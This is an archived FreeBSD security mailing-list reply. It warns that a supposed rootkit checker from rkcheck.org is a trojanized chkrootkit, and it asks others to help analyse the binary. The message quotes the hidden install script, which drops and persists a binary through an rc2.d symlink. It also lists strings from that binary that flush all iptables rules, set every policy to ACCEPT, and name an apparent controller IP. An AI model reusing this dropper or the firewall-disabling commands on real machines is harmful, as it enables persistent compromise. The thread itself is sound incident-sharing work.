Skip site navigation (1)Skip section navigation (2) 
Date:      Wed, 25 Feb 2015 20:55:43 +0000
From:      Christopher Schulte <christopher@schulte.org>
To:        Philip Jocks <pjlists@netzkommune.com>
Cc:        Joseph Mingrone <jrm@ftfl.ca>, "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>
Subject:   Re: has my 10.1-RELEASE system been compromised
Message-ID:  <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
References:  <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
index | next in thread | previous in thread | raw e-mail 


> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> wrote:
> 
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains 
> 
> #!/bin/bash
> 
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
> 
> That doesn't look like something you'd want on your box…

I filed a report with Google about that domain (Google Safe Browsing), briefly describing what’s been recounted here on this thread.  It seems quite suspicious, agreed.

Has anyone started an analysis of the rrsyncn binary?  The last few lines of a simple string dump are interesting… take note what looks to be an IP address of 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
> 
> Philip

Chris
help

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C>